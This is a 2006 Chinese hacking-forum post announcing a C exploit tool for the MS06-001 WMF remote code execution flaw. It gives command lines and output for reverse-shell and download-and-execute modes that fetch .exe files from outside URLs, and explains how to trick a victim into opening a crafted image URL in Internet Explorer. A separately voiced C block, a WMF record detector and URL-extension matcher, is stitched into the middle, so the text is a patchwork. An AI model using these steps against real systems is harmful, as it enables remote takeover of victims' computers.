MS06-001 WMF file remote code execution exploit program (invincible edition) - vulnerability warning - the black bar safety net (myhack58)

2006-01-14T00:00:00
ID MYHACK58:6220066341
Type myhack58
Reporter 佚名 (anonymous)
Modified 2006-01-14T00:00:00

Description

I've never posted anything original, and if I don't post something 冰血 is going to SM me :-). The WMF file format vulnerability has been out for so long, and only recently have I had time to study it. Presumably this vulnerability has attracted a lot of eyeballs too. Metasploit is really impressive; its exploits are always released so promptly and effectively... With nothing better to do, I rewrote it as a C version. The program's usage help is as follows:

QUOTE:

Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION

codez by superlone@EST

Usage: wmfexp

shell type <====> 1: <====>

e.g.: wmfexp 1 192.168.1.111 8080 192.168.1.111 1314

shell type <====> 2: <====>

e.g.: wmfexp 2 192.168.1.111 8080 http://www.eviloctal.com/superlone.exe

^_^ SHOW my love to LiuHui,for EVER and EVER!!!!

Understandable enough, I don't need to say more? The reverse-connect example is as follows:

QUOTE:

E:\temp\Release>wmfexp 1 192.168.1.111 8080 192.168.1.111 1314
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^^binding 192.168.1.111 on port 8080 with socket ...DONE!
^^waiting for connection of ANY.WMF request ...GOT IT!
^^connection received from 192.168.1.3 on port 42249
^^generating payload ...DONE!
^^sending crafted data to the remote host 192.168.1.3 ...DONE!
^^do i work well?-)

See the screenshot for the result.

The download-and-execute example is as follows:

QUOTE:

E:\temp\Release>wmfexp 2 192.168.1.111 8080 http://www.huibian.com/wmf/wmf.exe
Microsoft Windows / Internet Explorer WMF Remote Code Execution Exploit

P.O.C VERSION written by superlone@EST

^_^MY love goes to my wife for EVER and EVER

^^binding 192.168.1.111 on port 8080 with socket ...DONE!
^^waiting for connection of ANY.WMF request ...GOT IT!
^^connection received from 192.168.1.3 on port 43529
^^generating payload ...DONE!
^^sending crafted data to the remote host 192.168.1.3 ...DONE!
^^do i work well?-)

The results are shown in the accompanying screenshots.

Since this is a POC version I have not optimized the shellcode; I will publish the code after a while and you can modify it yourselves!!!

PS: I also tested this successfully on SP2; I don't know whether you know the test method. Port 8080 is the locally bound port, disguised as an HTTP server. If this port is already in use by another program, the program will show "..._ error: the bind operation failed", so use a port that is not already taken. Also, there are probably quite a few friends who don't understand how to use this exploit program. When the program shows "^_^waiting for connection of ANY.WMF request...", the exploit is running and is already listening on the port you set, 8080 in this case. Now you need to use your imagination and find a way to get the other party to open your URL in IE. Don't know your URL? Strange, I forgot to tell you: if the other party visits a URL of the form http://your-IP:your-listening-port/any.wmf

they get caught. Your IP goes without saying, right? On the external network you will of course need a public IP... Your listening port is the port of the disguised HTTP server, 8080 in the example. any.wmf can be any file name, whatever you like to write, but the extension must be one of the following: dib emf wmf bmp tiff. For example this URL: http://192.168.1.111:8080/mylove.tiff. As long as a vulnerable host opens the above URL with IE, it gets owned... In addition, the screenshot from my test with the Windows 按键精灵 ("button wizard") tool shows the XP SP1 machine successfully downloading and executing after visiting my URL.
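The disguised HTTP server described above boils down to two checks, shown here as an added example in C (my code, not superlone's wmfexp, whose source is not on this page): the listener only needs to recognize a request line whose path ends in one of the five extensions the post lists, and a defender looking at what such a server sends back wants to know whether a WMF blob carries the META_ESCAPE/SETABORTPROC record that MS06-001 turns into code execution (a fact about the bug itself, not something the post states). The WMF byte strings are constructed for the demo and contain no shellcode; the function and constant names are my own.

```c
/* Added example, not code from the original post.
 *  request_wants_image(): does an HTTP request line ask for a path whose
 *      extension is dib/emf/wmf/bmp/tiff (the list given in the post)?
 *  wmf_has_setabortproc(): does a WMF blob contain a META_ESCAPE record
 *      with the SETABORTPROC escape, the MS06-001 trigger (not on the page)?
 * Sample WMF bytes below are constructed for the demo; no shellcode. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static const char *const kImageExts[] = { "dib", "emf", "wmf", "bmp", "tiff" };

/* Return 1 if "METHOD SP path SP version" names a handled image extension,
 * 0 otherwise. The query string is ignored; the match is case-insensitive. */
int request_wants_image(const char *request_line)
{
    char path[256];
    if (sscanf(request_line, "%*s %255s", path) != 1)
        return 0;
    char *q = strchr(path, '?');
    if (q) *q = '\0';                      /* drop ?query */
    const char *base = strrchr(path, '/');
    const char *dot = strrchr(base ? base : path, '.');
    if (!dot || dot[1] == '\0')
        return 0;                          /* no extension on the last segment */
    const char *ext = dot + 1;
    for (size_t i = 0; i < sizeof kImageExts / sizeof kImageExts[0]; i++) {
        const char *k = kImageExts[i];
        size_t j = 0;
        while (k[j] && ext[j] && tolower((unsigned char)ext[j]) == k[j])
            j++;
        if (!k[j] && !ext[j])
            return 1;                      /* full, case-insensitive match */
    }
    return 0;
}

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }

#define WMF_PLACEABLE_KEY 0x9AC6CDD7u   /* optional 22-byte placeable header */
#define META_ESCAPE       0x0626
#define SETABORTPROC      0x0009

/* Walk the WMF record list. Returns 1 if a META_ESCAPE record carries the
 * SETABORTPROC escape, 0 if the file ends cleanly at META_EOF without one,
 * -1 if the blob is truncated or malformed. */
int wmf_has_setabortproc(const uint8_t *buf, size_t len)
{
    size_t off = 0;
    if (len >= 22 && rd32(buf) == WMF_PLACEABLE_KEY)
        off = 22;
    if (len < off + 18 || rd16(buf + off + 2) != 9)
        return -1;                         /* standard header is 9 words */
    off += 18;
    while (off + 6 <= len) {               /* record: size(4, in words) func(2) */
        uint32_t words = rd32(buf + off);
        uint16_t func  = rd16(buf + off + 4);
        if (words < 3 || words > (len - off) / 2)
            return -1;                     /* size must cover its own header and fit */
        if (func == 0)
            return 0;                      /* META_EOF */
        if (func == META_ESCAPE && words >= 5 && rd16(buf + off + 6) == SETABORTPROC)
            return 1;
        off += (size_t)words * 2;
    }
    return -1;                             /* ran off the end without META_EOF */
}

/* Constructed samples: 18-byte header, META_SETMAPMODE (0x0103), then either
 * META_ESCAPE/SETABORTPROC or nothing, then META_EOF. */
static const uint8_t kBadWmf[] = {
    0x01,0x00, 0x09,0x00, 0x00,0x03, 0x15,0x00,0x00,0x00, 0x00,0x00,
    0x05,0x00,0x00,0x00, 0x00,0x00,
    0x04,0x00,0x00,0x00, 0x03,0x01, 0x08,0x00,
    0x05,0x00,0x00,0x00, 0x26,0x06, 0x09,0x00, 0x00,0x00,
    0x03,0x00,0x00,0x00, 0x00,0x00
};
static const uint8_t kGoodWmf[] = {
    0x01,0x00, 0x09,0x00, 0x00,0x03, 0x10,0x00,0x00,0x00, 0x00,0x00,
    0x04,0x00,0x00,0x00, 0x00,0x00,
    0x04,0x00,0x00,0x00, 0x03,0x01, 0x08,0x00,
    0x03,0x00,0x00,0x00, 0x00,0x00
};

int main(void)
{
    printf("GET /any.wmf      -> %d\n", request_wants_image("GET /any.wmf HTTP/1.1"));
    printf("GET /index.html   -> %d\n", request_wants_image("GET /index.html HTTP/1.1"));
    printf("bad wmf           -> %d\n", wmf_has_setabortproc(kBadWmf, sizeof kBadWmf));
    printf("good wmf          -> %d\n", wmf_has_setabortproc(kGoodWmf, sizeof kGoodWmf));
    return 0;
}
```

The extension check is what lets the fake server answer any path with the same crafted body, which is why the post says the file name before the extension does not matter; the record walker is the check to run on a suspicious image captured from such a server, and it deliberately refuses records whose declared size does not fit the buffer rather than trusting the length field.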

Understood? My program provides two functions, reverse connect and download-and-execute, and I recommend you use download-and-execute... Why? Go find out for yourself. Also, what is released here is the P.O.C version, so there is no analysis of the HTTP request packet, for example to determine whether the target machine is XP or above. If you need the source code you can come and find me, or it will be published in a couple of days. If you still don't understand, I can't help it; 小崽 (the cub) said my ability to express myself in words is very strong...

Note: the extension used in the test URL must be one of the following: dib emf wmf bmp tiff